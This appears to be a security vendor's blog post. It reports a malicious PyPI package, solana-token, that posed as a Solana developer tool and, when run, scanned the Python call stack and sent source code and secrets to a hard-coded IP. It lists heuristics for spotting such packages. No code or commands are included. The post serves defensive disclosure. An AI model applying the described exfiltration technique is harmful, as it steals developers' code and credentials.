Same name, different hack: PyPI package targets Solana developers

The ReversingLabs research team has written about the surge in recent years in software supply chain attacks that target cryptocurrency. RL’s 2025 Software Supply Chain Security Report documented 23 distinct malicious supply chain campaigns targeting cryptocurrency applications and infrastructure in 2024 alone.

That trend continues. So far in 2025, RL researchers discovered a number of new campaigns that appear to target cryptocurrency assets. In April, for example, RL researcher Lucija Valentić wrote about the discovery of an npm package, pdf-to-office, that injected malicious code into legitimate, locally-installed files to steal funds stored in Atomic Wallet and Exodus crypto wallets.

The research team’s latest discovery involves a malicious PyPI open source package that poses as an application for the Solana blockchain: solana-token. When installed, the malicious package attempts to exfiltrate source code and developer secrets from the developer’s machine to a hard-coded IP address.

Here’s what RL researchers found — and how organizations should respond to address the growing number of supply chain threats targeting cryptocurrency projects.

All eyes on crypto

Solana is a popular, open-source blockchain platform founded in 2017 and designed by San Francisco-based Solana Labs to support a range of decentralized, scalable financial applications and services. The project is run by the Geneva-based Solana Foundation.

Solana is sought after within cryptocurrency circles for the speed of transactions and the relatively low transaction fees it allows compared to blockchains like Ethereum. The platform also supports the popular Solana (SOL) cryptocurrency.

The Python package RL detected, solana-token, pretends to be a utility for developers working on applications that leverage the Solana blockchain. While the PyPI landing page for the package did not include a description, the package name and functions suggest that developers looking to create their own blockchains were the likely targets of the malicious actors behind this package.

Before PyPI removed the solana-token package, it was downloaded more than 600 times, possibly via links shared and promoted on developer-focused platforms.

How the malicious package was discovered

What made this package stand out was a short list of characteristics present in the majority of malicious open source and commercial, third-party software packages the RL research team has discovered. They include:

• Code containing URLs that reference a host by IP address. This is a common strategy used to obscure communications with malicious command and control servers or hosts used to store exfiltrated data. Using the IP address versus a host name makes it (somewhat) less likely that scanning tools will flag the behavior.
• Code that initiates outbound communications to non-standard ports on external servers. Communications to ports other than those that are commonly used such as 443 (HTTPS), 53 (DNS), 22 (SSH) and 23 (Telnet) is not necessarily malicious behavior, but it is worthy of further investigation.
• Code that reads from files. Application code that reads data from files is a common feature of “infostealer” malware. While not conclusively malicious it is, like so many other suspicious behaviors, one that warrants closer inspection by developers.

The hunt for secrets is on

The suspicious behaviors in solana-token were implemented with two clear goals: stealing application code, and gathering sensitive information or developer secrets that might be hiding within it. For example, the solana-token package contained a method that was ostensibly intended to implement blockchain functionality. However, when executed, this method scanned the Python execution stack, then copied and exfiltrated source code contained in all the files in the execution chain to a remote server.

This kind of malicious behavior is not commonly seen in the malware the RL research team has identified hiding in open source packages. The objective in solana-token, the team believes, was to steal hardcoded crypto-related secrets that often lie unprotected within code. Those secrets can then be used to access sensitive infrastructure and applications such as cryptocurrency wallets.

Our researchers have seen this type of behavior before. ​For example, in 2024 the team uncovered and I wrote about a malicious campaign, dubbed "BIPClip" that involved seven PyPI packages designed to steal BIP39 mnemonic phrases used for crypto wallet recovery. These packages, downloaded nearly 7,500 times, also targeted developers by masquerading as legitimate tools, as with solana-token.

Same name, different hack

An interesting thing to note is that this isn’t the first time we’ve discovered a malicious package named solana-token. In fact, this package is reusing the name of a package published a year ago that was detected and removed. (A history of all the solana-token packages can be found at secure.software.) The package version numbers are different (0.0.1 and 0.0.2 in the latest versions, versus 1.0.1 and 1.0.2 in the earlier versions). And the content of the packages themselves is different. RL does not have conclusive evidence that the same malicious actors are behind both packages, though it is possible.

What is interesting is that it should not be possible to re-use the name of a malicious package that has been removed from PyPI. However, PyPI told RL the authors of the prior solana-token packages removed it from PyPI, not the PyPI security administrators. That left the package name available for re-use. The fact that it was suggests the same malicious actors that pulled down the earlier solana-token package may be behind the new malicious version.

This time, RL reported the latest solana-token package to the PyPI administrators and it has been removed. That should make it impossible to continue posting files to PyPI that use the solana-token name.

Indicators of Compromise (IOCs)

Indicators of Compromise (IoCs) refer to forensic artifacts or evidence related to a security breach or unauthorized activity on a computer network or system. IOCs play a crucial role in cybersecurity investigations and cybersecurity incident response efforts, helping analysts and cybersecurity professionals identify and detect potential security incidents.

The following IOCs were collected as part of RL investigation of solana-token and the malicious software supply chain campaign.

Supply chain attacks on crypto projects continue

The discovery of another malicious open source module that appears to target developers working on cryptocurrency related applications makes it clear that supply chain attacks on crypto-related projects are continuing. Unlike recent attacks however, such as those targeting the Atomic and Exodus crypto wallets, solana-token clearly targets crypto developers with the goal of obtaining application code and the sensitive information it contains - almost certainly as a precursor to other attacks.

The solana-token package is a reminder to development teams and organizations to be on the lookout for supply chain threats and attacks. Development teams need to aggressively monitor for suspicious activity or unexplained changes within both open source and commercial, third-party software modules. By stopping malicious code before it is allowed to penetrate secure development environments, teams can prevent destructive supply chain attacks.